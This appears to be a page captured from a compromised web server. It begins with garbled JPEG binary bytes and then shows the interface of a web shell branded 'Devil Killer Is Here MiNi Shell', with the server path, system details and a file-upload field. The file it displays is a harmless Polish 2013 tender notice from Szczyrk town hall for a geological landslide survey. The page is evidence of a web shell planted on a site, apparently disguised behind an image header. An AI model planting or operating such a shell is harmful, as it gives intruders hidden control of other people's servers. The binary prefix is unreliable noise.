JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130917/377092-N-2013.html

<p class="kh_header"><b>Szczyrk: Wykonanie dokumentacji geologiczno inżynierskiej z analizą stateczności  zbocza osuwiska w Szczyrku Dunacie</b><br>
<b>Numer ogłoszenia: 377092 - 2013; data zamieszczenia: 17.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szczyrku , ul. Beskidzka 4, 43-370 Szczyrk, woj. śląskie, tel. 033 8295026, faks 033 8178763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczyrk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji geologiczno inżynierskiej z analizą stateczności  zbocza osuwiska w Szczyrku Dunacie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
Wykonanie dokumentacji geologiczno inżynierskiej z analizą stateczności  zbocza osuwiska w Szczyrku Dunacie  oraz założenie monitoringu powierzchniowego i wgłębnego osuwiska.                   
Opis stanu istniejącego
Według Karty dokumentacyjnej osuwiska numer ewidencyjny 24 02 011, numer roboczy osuwiska 1, strefa osuwiskowa osuwisko występuje w obrębie północnego, dolnego stoku góry Skrzyczne w obrębie dzielnicy Szczyrk  Dunacie. Osuwisko jest jedną z części systemu kilku połączonych osuwisk, rozpościerających się w kierunku zachodnim od części dokumentowanego osuwiska. Jest to osuwisko stare, jego początki aktywności związane są prawdopodobnie z późnym holocenem. Powierzchnia osuwiska wynosi ok. 8 ha, szerokość 280 m, długość 340 m. Osuwisko początkowo nieaktywne uległo odnowieniu uaktywnieniu w okresie ostatnich 3, 4 lat, kiedy to zaobserwowano nagły wzrost nawodnienia tego ternu przejawiający się licznymi wysiękami wodnymi, źródliskami oraz pojawieniem się wilgoci w budynkach i ich bezpośrednim sąsiedztwie. Osuwisko posiada wykształcone 3,4 skarpy osuwiskowe główna i wtórne, jęzor osuwiskowy, który stanowi równocześnie stromy, wysoki brzeg potoku Dunacie, oraz liczne zbiorniki wodne wykształcone w postaci bezodpływowych zagłębień i niecek porośniętych roślinnością wodnolubną. Teren osuwiska stanowi stok częściowo zabudowany budynkami mieszkalnymi oraz gospodarczymi i rekreacyjnymi.
Powierzchnia poślizgu osuwiska jak wynika z opracowanej Karty dokumentacyjnej, może przebiegać na głębokości ok. 20 m ppt. Przemieszczeniu uległa  warstwa deluwiów stokowych oraz wietrzelin. Wpływ na rozwój i aktywność osuwiska miały infiltrujące wody opadowe. Aktywność osuwiska może zmieniać się w zależności od warunków atmosferycznych oraz zawodnienia gruntów.
Przyczynę powstania osuwiska wg wstępnych ustaleń oraz materiałów archiwalnych Karta dokumentacyjna osuwiska należy łączyć głównie z naturalnymi warunkami panującymi na przedmiotowym terenie  stoku tj.:
budową geologiczną  zaburzenia fałdowe, uskoki poprzeczne, występowanie łupków podatnych na działanie wody,
okresowym intensywnym nawodnieniem gruntów podłoża, powodującym znaczne osłabienie parametrów wytrzymałościowych gruntu.
2. Cel i zakres dokumentacji geologiczno inżynierskiej z analizą stateczności.
Celem niniejszych prac jest wykonanie badań geologiczno inżynierskich dla określenia budowy geologicznej, przyczyn powstania osuwiska, rozpoznania miąższości koluwiów wraz z rozpoznaniem przebiegu powierzchni poślizgu. 
Poprzez ustalenie warunków  geologiczno  inżynierskich, hydrogeologicznych zostanie określony stan podłoża gruntowego stoku. Interpretacja wyników robót geologicznych  m.in. pozwoli na określenie minimalnego zakresu  robót  budowlanych dla  ewentualnego wykonania stabilizacji terenu  występującego tu osuwiska. Ponadto w trakcie realizacji prac objętych  Projektem, zostanie wykonany system monitoringu  w skład którego wchodzić będzie inklinometr i piezometr, oraz powierzchniowe repery sieci geodezyjnej.
System monitoringu będzie służył określeniu: stopnia aktywności geomorfologicznej, parametrów geometrycznych strefy osuwiskowej, głębokości przemieszczeń i ilości płaszczyzn poślizgu oraz wielkości i kierunku przemieszczeń poziomych. Monitoring strefy osuwiskowej powierzchniowy oraz wgłębny winien być prowadzony celem obserwacji ruchu mas koluwialnych, zarówno przed, jak i po wykonaniu ewentualnych zabezpieczeń.  Głównymi robotami badawczymi będą wiercenia badawcze oraz badania geofizyczne i badania laboratoryjne gruntu i wody podziemnej. Po wykonaniu robót w terenie, winny zostać przeprowadzone prace kameralne, których rezultatem będzie dokumentacja geologiczno inżynierska zawierająca wyniki robót geologicznych oraz ich pełną interpretację wraz z wnioskami i zaleceniami.
Dla osiągnięcia zamierzonego celu przewiduje się wykonanie następujących badań, robót  i prac geologicznych:
I. Zakres  prac obejmuje m.in.:
a) wykonanie ośmiu otworów systemem mechanicznym, sposobem obrotowym na płuczkę wodną z użyciem koronek widiowych i diamentowych z podwójnym aparatem rdzeniowym średnicy  110 mm, 143 mm dla zabudowy piezometru do głębokości :
otwór I z zabudowanymi rurami inklinometrycznymi średnicy  70 - 85 mm do obserwacji przemieszczeń, głębokości ok. 50 m,
otwór P1  z zabudowaną  kolumn filtracyjną średnicy  50 - 110 mm obserwacji stanu wód głębokości ok. 20m,
otwór OG 1 głębokości ok. 20 m,
otwór OG 2 głębokości ok. 20 m,
otwór OG 3 głębokości ok. 60 m,
otwór OG 4 głębokości ok. 50 m,
otwór OG 5 głębokości ok. 60 m,
otwór OG 6 głębokości ok. 50 m, z możliwością spłycenia otworów,
b) prowadzenie przed rozpoczęciem oraz w trakcie wierceń obserwacji zachowania się zwierciadła wody w studniach gospodarczych zlokalizowanych w promieniu 50 m od każdego z otworów,
c) kartowanie geologiczno  inżynierskie osuwiska i terenu przyległego ok. 50 m od wyznaczonych granic osuwiska,
d) opróbowanie wyrobisk:
pobór prób gruntów o naturalnej wilgotności  z warstw różnych pod względem litologii i stanu, lecz nie rzadziej niż  co 2,0 m,
pobór prób gruntów o nienaruszonej strukturze z wierceń rdzeniowych otworów,
e) badania laboratoryjne gruntów obejmujące oznaczenie następujących parametrów:
analizy makroskopowej, wilgotności naturalnej, gęstości objętościowej, wskaźnika rozmakalności, stopnia plastyczności, ciśnienia pęcznienia, wskaźnika pęcznienia, kąta tarcia wewnętrznego, spójności, wytrzymałości na ścinanie, edometrycznych modułów ściśliwości,
analizę wody z każdego przewierconego poziomu wodonośnego pod kątem jej agresywności w stosunku do betonu  i stali,
f) badania geofizyczne pomiary elektrooporowe i konduktometryczne,
g) pomiary geodezyjne: wytyczenie i niwelacje wyrobisk oraz instalacje punktów monitoringu powierzchniowego i pomiary zerowe,
h) dozór geologiczny nad prowadzonymi robotami,
i) likwidację wykonanych wyrobisk,
j) opracowanie dokumentacji geologiczno inżynierskiej z analizą stateczności zbocza.
3. Dokumentacja winna być opracowana zgodnie z przepisami :
Ustawy Prawo geologiczne i górnicze  Dz. U. z 2011 r. Nr 163 poz. 981,
Rozporządzenia Ministra Środowiska z dnia 23 grudnia 2011r., w sprawie dokumentacji hydrogeologicznej i dokumentacji geologiczno inżynierskiej Dz. U. z 2011r, Nr 291, poz.1714,
Rozporządzenia Ministra Środowiska z dnia 20 czerwca 2007r. w sprawie informacji dotyczących ruchów masowych ziemi Dz. U. 2007, Nr 121, poz. 840,
Wykonawcy zobowiązany jest uzyskać od właściwych organów administracji geologicznej pozytywną decyzję  zatwierdzającą dokumentację  geologiczno inżynierską oraz opinię Państwowego Instytutu Geologicznego  i Wojewódzkiego Zespołu Nadzorującego Realizację Projektu Osłona Przeciwosuwiskowa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.19.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.02.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie pobiera się.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj. udokumentuje wykonanie usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zamówienia polegającego na wykonaniu  dokumentacji geologiczno  inżynierskiej dla potrzeb stabilizacji osuwiska minimum o łącznej powierzchni 8 h w ramach jednego zlecenia, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługa została wykonana oraz załączą dowody, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie  i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone tj.:  
Zamawiający wymaga aby wykonawca dysponował osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi, kontrolę jakości oraz kierowanie robotami geologiczno-inżynierskimi.
Wykonawca wykaże że osoba odpowiedzialna za świadczenie usługi  wykonała co najmniej jedno zamówienia polegającego na wykonaniu  dokumentacji geologiczno  inżynierskiej dla potrzeb stabilizacji osuwiska minimum o łącznej powierzchni 8 h w ramach jednego zlecenia,  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z oświadczeniami, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane prawem uprawnienia w szczególności uprawnienia geologiczne zgodnie z ustawą Prawo Geologiczne i górnicze i Rozporządzeniem Ministra Środowiska z dnia 16 grudnia 2011 r., w sprawie kwalifikacji w zakresie geologii.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w trybie art.44 oraz Oświadczenie w trybie art.26 ust.2b w związku z art.22 Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy przy zaistnieniu okoliczności nie zależnych od stron umowy tj.:
a)odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych, 
2. Zamawiający przewiduje możliwość zmiany umowy przy zaistnieniu okoliczności nie zależnych od stron umowy,   w zakresie terminu realizacji z uwagi na:
a) wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania  terminu określonego w SIWZ. Termin ten może ulec przedłużeniu, nie więcej jednak niż o czas trwania tych okoliczności. Wykonawca nie będzie miał prawa do przedłużenia terminu zakończenia robót jeśli jego przedłużenie wynika z przyczyn leżących po stronie Wykonawcy.
b) w przypadku wystąpienia siły wyższej , w tym niekorzystnych warunków atmosferycznych uniemożliwiających realizację zlecenia (odwiertów),
3. W trakcie trwania niniejszej umowy Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o: 
 1) zmianie siedziby lub nazwy firmy, 
 2) zmianie osób reprezentujących, 
 3) ogłoszeniu upadłości 
 4) ogłoszeniu likwidacji, 
 5) zawieszenia działalności, 
 6) wszczęcia postępowania układowego, w którym uczestniczy Wykonawca, 
 7) wszczętych postępowaniach egzekucyjnych .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.szczyrk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szczyrku 
ul. Beskidzka 4
43-370 Szczyrk
Pokój nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2013 godzina 10:00, miejsce: Urząd Miejski w Szczyrku 
ul. Beskidzka 4
43-370 Szczyrk
Dziennik Podawczy nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com